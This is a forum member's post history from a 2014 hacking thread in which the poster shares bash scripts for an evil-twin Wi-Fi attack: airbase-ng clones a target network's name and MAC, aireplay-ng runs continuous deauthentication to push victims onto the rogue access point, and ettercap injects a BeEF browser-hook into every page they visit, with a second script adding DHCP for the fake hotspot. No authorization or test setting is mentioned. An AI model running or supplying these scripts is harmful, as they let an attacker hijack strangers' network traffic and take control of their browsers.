Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - nicbit

Pages: [1]
1
Hacking and Security / Re: using ettercap and an evil twin with ARP deauth attack to inject a BeEF hook
« on: February 20, 2014, 02:22:06 am »
sorry about my lack of specificity... I believe the problem is that the DHCP server, though I specifically started it, is not enabled, as when I attempt to connect to the AP, I always obtain the error "unable to connect to network." Currently, because of the trouble airbase and ISC-DHCP (why did they need to upgrade from DHCP3!!! WHY!?!?!) I am planning on reimplementing this as a library, in which, the following functionality will be available:
1. automatic DHCP forwarding (but can be further specified)
2. ARP spoofing and packet injection
3. an interface for rouge AP's to be set up
4. easy packet interception/injection
geered specifically twoard easy accsess from various programming languages as - at least to my knowlege - aircrack and other tools like that do not interface to multiple languages (other than BASH, of course.) I was contemplating writing this in java (with jpcap) or in c++, but having noticed that almost all of the networking libraries were implemented in ruby, python, or the god forsaken Perl, I was curious if there were any severe disadvantages to writing this in a compiled language.
Thanks!

2
Hacking and Security / Re: using ettercap and an evil twin with ARP deauth attack to inject a BeEF hook
« on: February 19, 2014, 08:57:02 pm »
Thanks for the response!
I will need to look at the source code available for aircrack. Also, sorry about the DSL's, I forgot that in programming, DSL has a completely different meaning than in networking... In Programming, DSL stands for a domain specific language i.e. a language which is only used for one specific application. A good example of this is matlab, which one would use heavily in mathematics, but would never think of using in networking. In general, domain specific languages are not "bogged down" with all of the unnecessary components (in Java, for example, one may never use the the 3d sound production, but they are still present In case one may need to use them) and are generally much better at their intended purpose than many mainstream languages may be. Perhaps, this question can be better stated as: does there exist any programming languages built specifically for penetration testing?
Thanks!

3
Hacking and Security / Re: using ettercap and an evil twin with ARP deauth attack to inject a BeEF hook
« on: February 19, 2014, 03:01:00 am »
Thanks for the quick response
As you implied, Aircrack does not provide DHCP services. After attempting to fix this egregious error with the following code:
Code: [Select]
#Taking user input
echo "Enter the SSID of the hotspot you wish to create"
read SSID
echo "Enter the channel you want your hotspot to broadcast on"
read CHANNEL
echo "Enter your wireless interface (ex: wlan0)"
read INTERFACE
#stopping all previous aircrack processes
airmon-ng check kill
#creating mon0
airmon-ng start $INTERFACE
#Starting up the hotspot (no DHCP yet)
airbase-ng --essid $SSID -c $CHANNEL mon0 &
#setting up at0
wait(5)
ifconfig at0 up
#########!!!!!!!!!-NOTE TO SELF: MAKE SURE TO CHANGE THE NETMASK, IP, AND GATEWAY TO FIT NEEDS-!!!!!!!!!#########
ifconfig at0 up 192.168.2.1/24
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
service network-manager restart
service isc-dhcp-server restart
echo "dhcp server up"
 I noticed a few oddities (namely typing in these commands by hand produce a different result than running them). What caught my eye is that the error code implied that the logical interface at0 had not been created yet, even though it should have been created by airbase. I was hoping you could provide an explanation for this.

Due to this massive confusion, I was curious about what other languages (as I can program in about 18 different programming languages: C++, Java, Ruby, Lua, etc...) these features are available in, as I am still very unfamiliar with BASH (obviously) and feel that reimplementing at least part of these libraries may help me. If not, is this functionality provided in a DSL?
Thanks in advance!

4
Hacking and Security / using ettercap and an evil twin with ARP deauth attack to inject a BeEF hook
« on: February 18, 2014, 12:50:48 am »
Hi, before I start, sorry for my n00bness, I just started learning this a few days ago  :-[ .
After getting BeEF up and running with port forwarding, I decided to attempt to right a script which would create a rouge AP, and force users to connect to it using an ARP deauthentication attack. Then, It would use ettercap's abilities to inject the javascript hook into every website visited on that rouge AP. This would inject the hook by using a filter located at filter/BeEF.ef.  Here is my script:
Code: [Select]
echo monitoring device:
read MON
echo MAC adress of network:
read MAC
echo Name of network:
read NAME
echo starting attack...
airbase-ng -e $NAME -a $MAC $MON &
aireplay-ng -0 0 --ignore-negative-one $MON &
ettercap -T -F filter/BeEF.ef
However, when I attempted to run this script, it did not work  >:( . Ive been trying to figure out what was wrong with this for the past 4 hours, to no avail.
Thanks in advance!

Pages: [1]